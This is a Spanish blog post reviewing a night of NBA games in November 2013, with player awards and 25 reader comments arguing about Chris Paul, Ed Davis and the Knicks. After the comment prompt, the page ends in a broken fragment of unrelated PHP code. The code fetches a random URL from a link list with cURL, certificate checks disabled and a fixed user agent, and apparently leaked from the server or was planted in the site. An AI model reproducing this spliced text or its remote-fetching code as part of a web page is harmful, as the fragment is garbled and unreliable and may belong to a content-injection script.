La Crónica: Balance perdedor, cabeza de serie

21 de November de 2013 por TheDeerHunter

Probablemente no se trate de lo más destacado del inmenso volumen de acontecimientos que ocurrieron ayer pero sí es una extraña circunstancia que meerce ser resaltada. Si la regular terminara hoy los Toronto Raptors ganarían la división Atlántico con poco más de un 40% de victorias, y por lo tanto quedarían 4º del Este y entrarían en PO por la parte alta del cuadro. Atendiendo al nivel de la conferencia no resultaría nada extraño que veamos algo así al final. Anoche hubo batalla  en el Wells Fargo de Philadelphia por el liderato de la división, con los locales en medio de una importante pájara, mucho más acorde a lo que todos esperábamos de ellos a pesar de aguantar todavía en zona de playoffs. Agarráos a la silla, porque Rudy Gay rozó el triple doble anoche con 8 asistencias y tanto DeRozan como Terrence Ross estuvieron finos ejecutando para asegurar pronto la victoria (108-98).

Por unas razones y por otras los “contendientes” de la Atlántico fueron protagonistas de la noche. Los Knicks prácticamente le perdonaron la vida a Indiana en el Madison, con una extraña falta de tiro triple cuando ganaban de 3 a segundos del final. En la prórroga, mientras Melo se hundía tras una poderosa actuación, George se crecía para poner las cosas en su sitio (103-96). El Madison Square Garden, por cierto, no disfruta una victoria local desde el 30 de octubre.

Los Celtics también se enfrentaban a los líderes, en este caso del Oeste, pero aún con un partido colectivamente digno y una extraordinaria actuación de Sullinger no se acercaron al nivel de los Spurs (93-104). Los Nets tampoco se acercan al nivel… pero de casi nadie. Ayer volvía Deron Williams pero sólo para hacer de privilegiado espectador ante la exhibición de Kemba Walker por culpa de una nueva lesión de tobillo. Los Bobcats se encuentran bastante cómodos con su 50% de victorias, balance que asegura postemporada en esta conferencia. Y ojo porque Al Jefferson, su gran fichaje del verano, no ha disfrutado de continuidad todavía (91-95). 

Los perseguidores mantienen el ritmo. Por un lado, Miami destrozó a Orlando (120-92) y Atlanta recuperó la senda de la victoria a costa de Detroit (85-93). Por el otro, Portland no tuvo piedad de Milwaukee (91-82) y, ojo, los Clippers se llevaron una importantísima victoria del Target Center de Minneapolis (102-98). Chris Paul rompió el récord de Magic Johnson de mejor inicio de temporada con doble-dobles de puntos y asistencias consecutivos. En el duelo Griffin-Love tampoco hubo color, con una mala actuación de este último.

Dallas y Memphis continúan su remontada. Por un lado, fantástico partido del dúo Nowitzki-Ellis para doblegar a Houston (120-123). Howard quiso reivindicarse en el debate que teníamos aquí con una actuación portentosa y…¡anotando los tiros libres! Los Grizzlies se llevaron una victoria importantísima en la bahía aprovechando, porqué no decirlo, la baja de Curry. Marc también nos aportó argumentos forzando la prórroga con una de sus maravillosas ayudas defensivas y una actuación global fabulosa. El choque fue a cara de perro, sin concesiones al ataque, y en ese terreno los Grizzlies salieron ganando (88-81).

Finalmente los Kings le ganaron el back-to-back a Phoenix que volvió a jugar sin Bledsoe (113-106). Debutaba Trey Burke pero los Jazz no pudieron con Anthony Davis y sus Pelicans (98-105). Y volviendo al Este, los Wizards ganaron a Cleveland y se meten en la pomada (98-91).

PREMIOS

MVP: Partidazo con mayúscula de la pareja Monta Ellis – Dirk Nowitzki que permitió a los Mavs llevarse la victoria tras un durísimo partido. El ex de los Bucks se fue a los 37 puntos (13 de 18) y 8 asistencias, y el alemán no se quedó muy atrás con 35 puntos, 7 rebotes y 4 asistencias. Grandes actuaciones también de Paul George y Anthony Davis. El alero de los Pacers liquidó a los Knicks en la prórroga y acabó el partido con 35 puntos, 5 rebotes, 4 asistencias y 5 robos. El jugador de los Pelicans anotó 22 puntos, cogió 9 rebotes y puso 8 tapones.

Rookie: Buen partido de Victor Oladipo a pesar de sus 8 pérdidas. Ante los Heat acabó con 20 puntos, 4 rebotes y 5 robos. Trey Burke debutó con 11 puntos en 12 minutos.

Sorpresa: Los Knicks le dieron la batuta a Beno Udrih y el esloveno respondió con 19 puntos, 8 rebotes y 4 asistencias. Terrence Ross disfrutó de minutos con los Raptors y lo agradeció con 17 puntos y 7 rebotes. Andray Blatche fue el mejor en la pesadilla de los Nets con 25 puntos y 7 rebotes.

Decepción: Día para esconderse y no saler de casa para Gordon Hayward. Anotó sólo 1 de sus 17 intentos co nun inmaculado 0 de 8 en triples. Por suerte, su contribución en el resto de aspectos fue notable. Algo parecido le pasó a Kevin Love que sólo anotó 2 de 14 pero capturó 12 rebotes y repartió 8 asistencias. Para malos, malos partidos los de Eric Gordon (9 puntos con un 3 de 13) y Tristan Thompson (2 puntos con un 0 de 5).

Esfuerzo en vano: Dwight Howard y Chandler Parsons estuvieron a la altura de Ellis y Nowitzki pero no pudieron llevarse el triunfo. Howard anotó 33 puntos y cogió 11 rebotes mientras que Parsons anotó 21 puntos, repartió 11 asistencias, cogió 5 rebotes y robo 4 balones. Spencer Hawes fue el mejor de los Sixers con 28 puntos y 10 rebotes.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

25 comentarios a esta entrada

  1. rumbero dice:
    #1

    Mira que no puedo con el flopper de Paul, pero sus últimos 5 minutos han sido acojonantes. Se había acercado Minny a 3 puntos pese a lo horribles que han estado en el tiro, pero ha finiquitado el partido como ha querido. Está para MVP.

    Y luego ¿que techo tiene Paul George? Porque hasta le fecha destacaba especialmente por su defensa pero este inicio está teniendo más protagonismo en ataque, tirando más y con mejores porcentajes que nunca, con media de 23 puntos y exhibiciones que ganan partidos. Pedazo de crack.

      Citar

  2. Denise dice:
    #2

    En el esfuerzo en vano destacaría también a Arron Afflalo.
    Obviamente no es el mejor escolta de la liga, pero en este justo momento sí está firmando números que le acrediten ser el mejor SG del momento.
    22’5 puntos, 4’7 rebotes, 4,5 asistencias, 49% en tiros de campo y 54% en triples con una media de 3 triples anotados por partido.
    Los Thunder necesitarían fichar a este jugador inmediatamente.

      Citar

  3. Mamba_Blanca dice:
    #3

    A Kidd le esta durando el puesto por ser quien es, si fuese cualquier otro entrenador de la liga, estaria haciendo las maletas para irse a su casa.

    Por cierto, ¿alguien sabe cuanto cobra Parsons? Porque en lo que va de temporada lleva 16.8ptos 5.2 reb y 4.6 asist. Esta todavia en salario rookie creo, pero cuando les toque renovarle, me parece que Houston va a tener que tirar de talonario.

    rumbero:
    Mira que no puedo con el flopper de Paul, pero sus últimos 5 minutos han sido acojonantes. Se había acercado Minny a 3 puntos pese a lo horribles que han estado en el tiro, pero ha finiquitado el partido como ha querido. Está para MVP.

    Yo tampoco puedo con el Rumbero, pero el dominio que tiene, sobretodo en los finales de partido, es impresionante, hace y deshace a su antojo el raton de 1,83.

      Citar

  4. Denise dice:
    #4

    Mamba_Blanca:

    Por cierto, ¿alguien sabe cuanto cobra Parsons? Porque en lo que va de temporada lleva 16.8ptos 5.2 reb y 4.6 asist. Esta todavia en salario rookie creo, pero cuando les toque renovarle, me parece que Houston va a tener que tirar de talonario.

    Parsons el año que viene sigue teniendo contrato rookie (964.750 dolares). Para los Rockets no deberia suponer un gran problema el renovarle porque el año que acaba contrato tambien lo hacen Asik y Lin y entre ambos dejan 16 millones de dolares de espacio, sólo con los 8 que deja Asik ya van sobrados para renovar a Parsons

      Citar

  5. Esteban dice:
    #5

    excelente debut Trey Burke, sin dudas un candidatazo al roy, puesto que tendrá muchísimos minutos y muchísimos tiros, calidad y sobretodo, al equipo que llega no puede estar peor, asi que sumando un par de victorias parecerá mas meritorio

    con el veo bastante mejor al JAZZ

    lo de Anthony Davis ya es de locos, cando estaba en la universidad, se hablaba que podia ser un bastion defensivo, pero segundo partido de 11 con 8 tapones es mas que ser un bastion defensivo

      Citar

  6. GreenPride dice:
    #6

    Bueno pues de anoche vi el Minny-Clippers. Partido malísimo en general, con los de Minnesotta con una defensa de pena sobre todo en transición y los Clippers con muchísimos fallos y pérdidas que metían de nuevo a los Wolves en el partido. A destacar el horrible partido en ataque de Love que imposibilitó a su equipo a buscar más la victoria. Y una vez llegado el momento de la verdad, lo único realmente bueno del partido, la exhibición final de CP3 que se rió de la defensa de los Wolves en general y de la de Ricky en particular y ganó el solito el partido. Podrá caernos mejor o peor pero a día de hoy creo que no hay duda de que es el base más decisivo de la liga (lo del mejor ya sería otra discusión). En general no me gustaron ninguno de los dos, pero Paul te hace ganar partidos…

      Citar

  7. Denise dice:
    #7

    ¿Que ha hecho Paul para que la mayoria os caiga mal? ¿Es por lo de Marc Gasol el año pasado en PO?
    A mi desde luego no me cae mal, y otros dos “odiosos” para la mayoría de la gente como Lebron ó Cristiano Ronaldo me encantan y que conste que no soy fan de ninguno de sus respectivos equipos.
    Ni los buenos son tan buenos ni los malos son tan malos

      Citar

  8. Denise dice:
    #8

    Lo de Memphis con Ed Davis no lo entiendo. No sé si es un jugador problematico ó no sé que problemas hay con él pero estan echando su carrera a perder, es una verguenza que no le den minutos y el cenutrio de Koufos esté por delante de él en la rotación.
    Y el que está muy mal es Bayless, con los buenos años que había dado anteriormente.

      Citar

  9. rumbero dice:
    #9

    Denise:
    ¿Que ha hecho Paul para que la mayoria os caiga mal? ¿Es por lo de Marc Gasol el año pasado en PO?A mi desde luego no me cae mal, y otros dos “odiosos” para la mayoría de la gente como Lebron ó Cristiano Ronaldo me encantan y que conste que no soy fan de ninguno de sus respectivos equipos.
    Ni los buenos son tan buenos ni los malos son tan malos

    Lo de Gasol es una más. Es que siempre está por ahí dando por culo y exagerando lo que no está escrito cada vez que le rozan la piel. Yo el año pasado le puse la cruz por esto:

      Citar

  10. Denise dice:
    #10

    rumbero: Lo de Gasol es una más. Es que siempre está por ahí dando por culo y exagerando lo que no está escrito cada vez que le rozan la piel. Yo el año pasado le puse la cruz por esto:

    OK, pero si es por teatrero, llorón, porculero y quejica, el mayor de todo eso lo tenemos en España, Rudy Fernandez. Ese si que es un asco de jugador.

      Citar

  11. Mamba_Blanca dice:
    #11

    Denise: OK, pero si es por teatrero, llorón, porculero y quejica, el mayor de todo eso lo tenemos en España, Rudy Fernandez. Ese si que es un asco de jugador.

    Denise, has dado en el clavo de los motivos por los que a mi, personalmente, no me gusta Chris Paul.

    En cuanto al tema de Rudy, es para darle de comer aparte, es imposible ver un partido suyo en el que no exagere o simplemente se acabe encarando con algun jugador del otro equipo

      Citar

  12. Ruxixón dice:
    #12

    Ahora que suenan rumores de un intercambio Wallace+Humphries xxx Stoudemire:

    https://vine.co/v/hFKzz7EWXbD

    Ha sido apartar a Grunwald del camino y los Knicks huelen a la época oscura de hace unos pocos años,madre mía que miedo da Dolan.

      Citar

  13. txusma dice:
    #13

    Denise:
    Lo de Memphis con Ed Davis no lo entiendo. No sé si es un jugador problematico ó no sé que problemas hay con él pero estan echando su carrera a perder, es una verguenza que no le den minutos y el cenutrio de Koufos esté por delante de él en la rotación.
    Y el que está muy mal es Bayless, con los buenos años que había dado anteriormente.

    Y pq cenutrio Kosta Koufos? En Denver resulta que juega por delante de McGee y en Memphis por delante de Koufos. Algo debe tener y creo q debe ir relacionado con una buena defensa y bastante inteligencia en pista. No es un ultra crack pero sabe lo que debe hacer en cada momento.
    Si tu no lo quieres ya me lo quedo yo como tercer pívot.

      Citar

  14. Simon dice:
    #14

    txusma: Y pq cenutrio Kosta Koufos? En Denver resulta que juega por delante de McGee y en Memphis por delante de Koufos. Algo debe tener y creo q debe ir relacionado con una buena defensa y bastante inteligencia en pista. No es un ultra crack pero sabe lo que debe hacer en cada momento.
    Si tu no lo quieres ya me lo quedo yo como tercer pívot.

    si que tiene que ser bueno si… para jugar por delante de sí mismo… jajajaja
    ahora en serio, a mi Koufos me parece un muy correcto pívot suplente, cerca de aro sin ser una maravilla es efectivo y es un grandísimo defensor y enorme reboteador. Vamos que se me ocurren pocos pívots suplentes mejores que él en toda la liga…

      Citar

  15. Simon dice:
    #15

    txusma: Y pq cenutrio Kosta Koufos? En Denver resulta que juega por delante de McGee y en Memphis por delante de Koufos. Algo debe tener y creo q debe ir relacionado con una buena defensa y bastante inteligencia en pista. No es un ultra crack pero sabe lo que debe hacer en cada momento.

    si que tiene que ser bueno si… para jugar por delante de sí mismo… jajajaja
    ahora en serio, a mi Koufos me parece un muy correcto pívot suplente, cerca de aro sin ser una maravilla es efectivo y es un grandísimo defensor y enorme reboteador. Vamos que se me ocurren pocos pívots suplentes mejores que él en toda la liga…

      Citar

  16. HisRoyalAirness dice:
    #16

    A mí lo de Paul me lleva poniendo enfermo varios años. Tiene una etiqueta de “tipo duro” que se la tiene muy creída y selecciona muy bien sus batallas. La de Marc fue la última pero a mí me había tocado especialmente los huevos la que tuvo con Pau, no por el hecho en sí sino porque me pareció una falta de respeto hacia un tipo 4 veces All-Star y con dos anillos. Entiendo que el status en la liga hay que ganárselo pero una vez eres campeón o demuestras lo que eres por lo menos tienes el respeto de la liga. Hace mucho como Garnett que siempre se pone estúpido con los extranjeros, aunque sean veteranos. Y me parece de cretino.
    Ayer hizo un amago con Pekovic y a los dos minutos el montenegrino le hizo un bloqueo ilegal que casi lo revienta. CP hizo el amago de levantarse a buscar gresca y cuando vio que era él se quedo calladito en el suelo. De hecho creo que lo de Marc fue parecido, que se pensaba que iba a ser tan calmado como el hermano y va a ser que no.

    Me hacen gracia los roles de tipo duro de los últimos diez años, que no hay ni que ganárselos, tipo Paul, Garnett, John Wall con Ilgauskas (os acordáis?). Antes sí querías ser un tipo duro te soltabas puñetazos en medio de la cancha, no te ponías tonto en medio de una tangana bien pegadito a los árbitros y a tus compañeros de equipo haciendo como que estás en medio y sabiendo que no va a pasarte nada.

    Me imagino a Isaiah Thomas (el de verdad), Larry Bird, Laimbeer, Jordan, Barkley o Rodman viendo a estos tipos duros y sus “peleas” exigiéndoles a los árbitros que piten todo y descojonándose en sus respectivos sofás.

    Y el flopping es un cáncer fomentado por la liga, porque protegen a ciertas estrellas y no al resto. Lo dije la semana pasada por aquí: Lebron, Harden, Paul, Griffin o Bosh roza el escándalo, porque ya lo tienen totalmente integrado a su forma de jugar y lo consideran normal. Además protestan cuando no reciben el call.

    Y lo de Rudy roza el bochorno, en la final de los juegos de Londres se marca una escenificación de “headshot” que clama al cielo (y se la pitan).

    Perdón por el tocho y mi talibanismo

      Citar

  17. HisRoyalAirness dice:
    #17

    Al margen de esto, su final de partido de ayer es un escándalo. No sé que decíaisp por ahí arriba de la defensa de Ricky, que mira que está flojo, pero en defensa estaba inmenso. Metió tiros increíbles el puto Carlton

      Citar

  18. Vader dice:
    #18

    Como los Knicks hagan ese trade de stat x wallace + humphries… Apaga y vamonos.

    Tiene muy mala pinta el futuro de los Knicks. Carmelo es muy bueno pero le falta equipo para aspirar a algo, tenemos varios contratos toxicos y sin rondas hasta 2018 creo. Absurdo.

      Citar

  19. Denise dice:
    #19

    txusma: Y pq cenutrio Kosta Koufos? En Denver resulta que juega por delante de McGee y en Memphis por delante de Koufos. Algo debe tener y creo q debe ir relacionado con una buena defensa y bastante inteligencia en pista. No es un ultra crack pero sabe lo que debe hacer en cada momento.
    Si tu no lo quieres ya me lo quedo yo como tercer pívot.

    Koufos no es un paquete, es un jugador util de equipo, pero para el fisico que tiene me parece un jugador muy limitado. En ataque no participa en el juego, no tiene visión, solo se limita a bloquear y esperar que le caiga una bola para hundirla ó tirarse un gancho a menos de 2 metros del aro, porque fuera de la zona es manco, un Gepeto Brothers.
    En defensa hace su trabajo pero tampoco me parece un virtuoso.

    Davis es mas un F, no un C puro como Koufos y tampoco es un jugador repleto de fundamentos, pero me parece un jugador muy productivo que cuando le dan minutos siempre cuaja buenas actuaciones, no entiendo como lleva 2 años en el ostracismo en Memphis.

      Citar

  20. TheDeerHunter dice:
    #20

    No se si me falla la memoria… pero Ed Davis lleva menos de un año en Memphis?
    El otro año de ostracismo que mencionas viene de Toronto… lo cierto es que parece extraño lo de este jugador. Tenía una pintaza buenísima al principio.

      Citar

  21. Denise dice:
    #21

    TheDeerHunter:
    No se si me falla la memoria… pero Ed Davis lleva menos de un año en Memphis?
    El otro año de ostracismo que mencionas viene de Toronto… lo cierto es que parece extraño lo de este jugador. Tenía una pintaza buenísima al principio.

    Te falla la memoria Deer, en Toronto era uno de los puntales del equipo hasta que fue traspasado en febrero por Rudy Gay.
    Sus números el año pasado (12-13) en Raptors fue de 45 partidos disputados, 24 como titular a 24 minutos de media, 9’7 puntos , 6’7 rebotes y un 55% en tiros de campo. Incluso anda el rumor de que cuando le confirmaron que se iba a Memphis, rompio a llorar y subió a las oficinas a pedir explicación a los directivos del equipo canadiense.

      Citar

  22. TheDeerHunter dice:
    #22

    No me falla del todo, Denise.
    Efectivamente traen a Davis en Enero, así que como digo no llega ni a un año.
    Después ciertamente firma una buena primera parte de campaña en Toronto antes de ser largado y, como dices, marginado en Memphis de forma un tanto extraña.
    Antes de eso sí había hecho un segundo muy malo. Desconozco el motivo.

      Citar

  23. Txusma dice:
    #23

    Lo extraño es que teniendo ya a Davis en el equipo, los Grizzlies se traen a Koufos. Supongo q la salida de Darrell Arthur tuvo algo que ver pero vaya, no dice nada bueno de las expectativas sobre Davis.

      Citar

  24. Denise dice:
    #24

    Txusma:
    Lo extraño es que teniendo ya a Davis en el equipo, los Grizzlies se traen a Koufos. Supongo q la salida de Darrell Arthur tuvo algo que ver pero vaya, no dice nada bueno de las expectativas sobre Davis.

    Bueno, Davis va a ser agente libre seguro el proximo verano, porque la oferta cualificada que tienen los Grizzlies sobre él comienza en 4’3 millones y a este paso no la van a ejecutar a no ser que Randolph se pire y busquen cubrirse las espaldas.

      Citar

  25. Viva_Dirk dice:
    #25

    Ed Davis no es compatible con Zach, de ahí que sus minutos sean tan pocos. Yo creo que hará una buena carrera, ya que no hay muchos jugadores con su tamaño que puedan aportar ofensivamente lo que el aporta y además es un buen reboteador. Aun tiene 24 años y deberia encontrar su sitio, sea como titular o como pivot de 20-25 minutos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>